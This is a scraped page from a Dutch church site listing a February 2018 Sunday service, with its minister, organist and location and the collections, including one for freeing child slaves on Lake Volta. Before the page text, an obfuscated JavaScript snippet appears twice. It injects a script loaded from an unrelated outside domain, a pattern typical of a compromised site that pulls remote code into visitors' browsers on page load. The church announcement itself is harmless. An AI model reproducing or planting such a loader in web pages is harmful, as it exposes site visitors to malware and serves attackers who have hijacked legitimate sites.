;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 4 februari 2018 9:30 uur - PKN Damwâld
zondag 4 februari 2018
09:30 uur

Kerkdienst zondag 4 februari 2018 9:30 uur

Informatie

Voorganger:Ds. L. Adema, Metslawier
Organist:Johanna van der Weide
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Werelddiaconaat-Visserijslaven in Ghana naar huis

Onder dwang werken duizenden kinderen in Ghana in de visserij op het Voltameer. Deze kindslaven, vooral jongens, worden vastgehouden op kleine eilandjes. Ze komen voornamelijk uit kwetsbare en arme gezinnen uit andere delen van het land. Het Voltameer is een enorm stuwmeer, dat vier keer zo groot is als Nederland. De kinderen kunnen niet ontsnappen aan de grillen van hun slavenmeesters.
Partnerorganisatie Challenging Heights bevrijdt kindslaven en vangt hen tijdelijk op. Voordat ze naar huis gaan, krijgen ze intensieve psychologische hulp en onderwijs. Ook krijgt hun familie hulp om een beter bestaan op te bouwen.
Met deze collecte steunt u het werk van Partnerorganisatie Challenging Heights.
Dit kan ook op NL 89 ABNA 0457 457 457 t.n.v. Kerk in Actie o.v.v. Werelddiaconaat februari .
Of op rekening van de diaconie NL52 RABO 0388 3077 73 t.n.v. Missionair werk Gereformeerde Kerk o.v.v. collecte 4 februari.
Alvast hartelijk dank!

Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud en inventaris